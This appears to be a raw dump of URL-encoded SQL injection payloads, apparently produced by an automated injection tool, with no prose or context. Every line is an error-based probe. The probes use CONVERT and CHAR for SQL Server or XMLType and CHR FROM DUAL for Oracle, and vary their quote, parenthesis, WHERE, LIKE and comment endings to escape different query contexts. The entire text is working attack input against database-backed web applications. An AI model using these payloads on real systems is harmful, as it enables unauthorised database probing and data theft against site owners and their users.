-6734%25%27%29%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -4226%25%27%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 -1682%00%27%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27ZXix%27%3D%27ZXix -1727%00%27%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27jiKe%27%3D%27jiKe -5867%27%29%20WHERE%203489%3D3489%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -3556%22%29%20WHERE%206868%3D6868%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -2843%29%20WHERE%204850%3D4850%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -4183%27%20WHERE%207976%3D7976%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -8253%22%20WHERE%207068%3D7068%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -1634%20WHERE%203735%3D3735%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -8905%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -4838%27%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -3401%27%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -2332%22%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -3778%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%283657%3D3657 -7492%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%288589%3D8589 -5681%29%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%289767%3D9767 -7493%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -2312%27%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27ZDHt%27%3D%27ZDHt -2556%27%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27tNFy%27%3D%27tNFy -8153%27%29%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27TNjn%27%3D%27TNjn -1267%27%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27bITd%27%3D%27bITd -2842%27%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27hwcv%27%20LIKE%20%27hwcv -8869%27%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27ROPl%27%20LIKE%20%27ROPl -1380%27%29%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27bQsW%27%20LIKE%20%27bQsW -5621%27%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27YDJk%27%20LIKE%20%27YDJk -2121%22%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22xNKP%22%3D%22xNKP -7239%22%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22nOgU%22%3D%22nOgU -6758%22%29%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22lYju%22%3D%22lYju -9217%22%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22AKmf%22%3D%22AKmf -8792%22%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22eryk%22%20LIKE%20%22eryk -1479%22%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22OXad%22%20LIKE%20%22OXad -7679%22%29%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22Ticg%22%20LIKE%20%22Ticg -3025%22%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22iCxe%22%20LIKE%20%22iCxe -3062%25%27%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -1732%25%27%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -7421%25%27%29%29%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -1038%25%27%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 -7945%00%27%29%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27XAmk%27%3D%27XAmk -3720%00%27%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27hyQF%27%3D%27hyQF -3124%27%29%20WHERE%204880%3D4880%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -5313%22%29%20WHERE%201842%3D1842%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -9905%29%20WHERE%201511%3D1511%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -9527%27%20WHERE%204323%3D4323%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -4608%22%20WHERE%203182%3D3182%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -2328%20WHERE%208771%3D8771%20OR%203491%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283491%3D3491%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -6346%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -9526%27%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -4777%27%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -3620%22%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -7444%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%288162%3D8162 -7665%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%288899%3D8899 -1660%29%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%285414%3D5414 -8745%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -3201%27%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27EQkd%27%3D%27EQkd -1989%27%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27QAPr%27%3D%27QAPr -5257%27%29%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27rkhT%27%3D%27rkhT -1659%27%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27xRSo%27%3D%27xRSo 